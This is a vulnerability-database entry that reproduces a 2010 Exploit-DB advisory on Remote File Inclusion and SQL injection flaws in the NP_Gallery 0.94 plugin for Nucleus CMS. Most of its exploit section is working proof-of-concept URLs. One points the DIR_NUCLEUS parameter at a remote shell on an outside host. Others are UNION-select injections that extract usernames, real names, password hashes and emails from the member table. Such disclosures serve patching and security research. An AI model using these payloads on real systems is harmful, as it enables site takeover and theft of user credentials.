Nucleus Plugin Gallery RFI & SQLi Vulnerability

vendor:

NP_Gallery

by:

AntiSecurity

8,8

CVSS

HIGH

Remote File Inclusion & SQL Injection

CWE

Product Name: NP_Gallery

Affected Version From: 0.94

Affected Version To: 0.94

Patch Exists: YES

Related CWE: N/A

CPE: a:nucleus_cms:np_gallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Nucleus Plugin Gallery RFI & SQLi Vulnerability

NP_Gallery version 0.94 is vulnerable to Remote File Inclusion and SQL Injection. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request can be sent to the NP_gallery.php file with the DIR_NUCLEUS parameter set to a malicious URL. An attacker can also exploit the SQL Injection vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The malicious request can be sent to the index.php file with the action, name, and type parameters set to plugin, gallery, and album or item respectively. The id parameter can be set to a malicious SQL query.

Mitigation:

Upgrade to the latest version of NP_Gallery and apply the latest security patches.

Source

Exploit-DB raw data:

=============================================================================================================


  [o] Nucleus Plugin Gallery RFI & SQLi Vulnerability
 
       Software : NP_Gallery version 0.94
       Download : http://wakka.xiffy.nl/_media/np_gallery_0941.zip?id=gallery&cache=cache
       Author   : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
       Contact  : public[at]antisecurity[dot]org
       Home     : http://antisecurity.org/


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=[evilc0de]

       http://localhost/[path]/index.php?action=plugin&name=gallery&type=album&id=[SQLi]

       http://localhost/[path]/index.php?action=plugin&name=gallery&type=item&id=[SQLi]


  [o] PoC

       http://localhost/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://host.com/shell?

       http://localhost/index.php?action=plugin&name=gallery&type=album&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--

       http://localhost/index.php?action=plugin&name=gallery&type=item&id=1+and+1=2+union+select+1,group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member--


=============================================================================================================


  [o] Greetz

       Angela Zhang stardustmemory aJe martfella pizzyroot Genex
       H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 inc0mp13te
       ArRay bjork xmazinha veter f1 & all people in #evilc0de [at] irc.byroe.net


=============================================================================================================


  [o] May 29 2010 - GMT +07:00 Jakarta, Indonesia